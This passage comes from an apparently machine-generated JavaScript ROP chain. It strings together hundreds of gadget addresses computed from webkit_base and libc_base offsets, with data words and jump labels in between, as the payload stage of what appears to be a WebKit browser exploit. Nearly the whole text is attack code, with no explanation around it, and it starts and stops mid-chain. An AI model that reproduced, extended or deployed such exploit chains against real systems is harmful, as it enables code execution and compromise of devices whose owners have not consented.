//pop rcx ]); //L3632: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3633: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3634: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+212368, //L3637 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+212336, //L3635 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3635: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3636: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3637: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+212504, //L3639 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+212520, //L3640 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+212488, //L3638 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3638: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3639: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3640: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+212632, //L3642 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+212680, //L3645 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+212648, //L3643 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3642: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3643: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3644: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3645: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+212792, //L3646+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+212784, //L3646 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3646: db([0, 0]); // 0x0 set_gadgets([ ropchain+212808, //L3646+24 ropchain+230352, //L3641 libc_base+764760, //pop rsi ropchain+212848, //L3647 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3647: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3649: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, 
rsi libc_base+764760, //pop rsi ropchain+212968, //L3652 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+212952, //L3650 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3650: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3652: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+213144, //L3655 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+213160, //L3656 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+213112, //L3653 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+213128, //L3654 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3653: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3654: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3655: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3656: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+213320, //L3660 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+213288, //L3658 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+213304, //L3659 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3657: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3658: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3659: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3660: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr 
rax, cl libc_base+764760, //pop rsi ropchain+213424, //L3663 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+213456, //L3665 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3662: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3663: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3664: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3665: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+213568, //L3666+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+213560, //L3666 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3666: db([0, 0]); // 0x0 set_gadgets([ ropchain+213584, //L3666+24 ropchain+214624, //L3661 libc_base+764760, //pop rsi ropchain+213624, //L3667 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3667: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3669: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+213744, //L3672 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+213728, //L3670 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3670: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3672: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+213920, //L3675 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+213936, //L3676 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+213888, //L3673 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+213904, //L3674 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3673: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3674: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3675: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3676: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+214032, //L3678 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+214016, //L3677 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3677: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3678: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3679: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3680: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3681: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+214232, //L3683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3683: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi 
ropchain+214288, //L3684 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3684: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+214424, //L3688 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+214408, //L3687 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3686: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3687: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3688: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+214512, //L3689 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+214544, //L3691 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3689: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3690: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3691: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+214616, //L3692 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3692: db([0, 0]); // 0x0 //L3661: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+214744, //L3695 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+214760, //L3696 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+214728, 
//L3694 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3694: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3695: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3696: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+214920, //L3701 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+214936, //L3702 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+214872, //L3698 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3698: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3699: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3700: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3701: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3702: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+215048, //L3703+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+215040, //L3703 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3703: db([0, 0]); // 0x0 set_gadgets([ ropchain+215064, //L3703+24 ropchain+217960, //L3697 libc_base+764760, //pop rsi ropchain+215104, //L3704 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3704: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3706: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+215224, //L3709 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi 
libc_base+764760, //pop rsi ropchain+215208, //L3707 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3707: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3709: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+215384, //L3713 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+215352, //L3711 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+215368, //L3712 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3710: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3711: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3712: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3713: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+215440, //L3715 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3715: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+215568, //L3717 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+215584, //L3718 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+215552, //L3716 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3716: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3717: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3718: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+215744, //L3722 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov 
rax, rcx libc_base+764760, //pop rsi ropchain+215712, //L3720 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+215728, //L3721 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3719: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3720: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3721: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3722: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+215800, //L3724 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3724: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+215928, //L3726 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+215944, //L3727 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+215912, //L3725 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3725: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3726: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3727: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+216104, //L3732 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+216120, //L3733 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+216056, //L3729 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3729: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3730: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3731: db([1, 
0]); // 0x1 set_gadget(webkit_base+3236123,); //pop r9 //L3732: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3733: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+216240, //L3734+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+216232, //L3734 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3734: db([0, 0]); // 0x0 set_gadgets([ ropchain+216256, //L3734+24 ropchain+217584, //L3728 libc_base+764760, //pop rsi ropchain+216296, //L3735 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3735: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3737: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+216416, //L3740 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+216400, //L3738 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3738: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3740: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+216592, //L3743 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+216608, //L3744 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+216560, //L3741 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+216576, //L3742 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); 
//L3741: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3742: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3743: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3744: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+216704, //L3746 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+216688, //L3745 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3745: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3746: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3747: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3748: db([2, 0]); // 0x2 set_gadget(libc_base+763368,); //pop rcx //L3749: db([2, 0]); // 0x2 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3750: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3751: db([3, 0]); // 0x3 set_gadget(libc_base+763368,); //pop rcx //L3752: db([3, 0]); // 0x3 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ 
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+217056, //L3754 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3754: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+217112, //L3755 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3755: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+217192, //L3758 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3758: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+217248, //L3759 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3759: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+217384, //L3763 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+217368, //L3762 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3761: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3762: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3763: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+217472, //L3764 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi 
ropchain+217504, //L3766 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3764: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3765: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3766: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+217576, //L3767 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3767: db([0, 0]); // 0x0 //L3728: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+217704, //L3770 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+217720, //L3771 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+217688, //L3769 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3769: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3770: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3771: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+217864, //L3774 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+217880, //L3775 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+217832, //L3772 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3772: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3773: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3774: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3775: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, 
//setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+217952, //L3776 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3776: db([0, 0]); // 0x0 //L3697: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+218080, //L3779 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+218096, //L3780 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+218064, //L3778 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3778: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3779: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3780: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+218208, //L3782 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+218256, //L3785 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+218224, //L3783 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3782: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3783: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3784: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3785: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+218368, //L3786+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+218360, //L3786 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); 
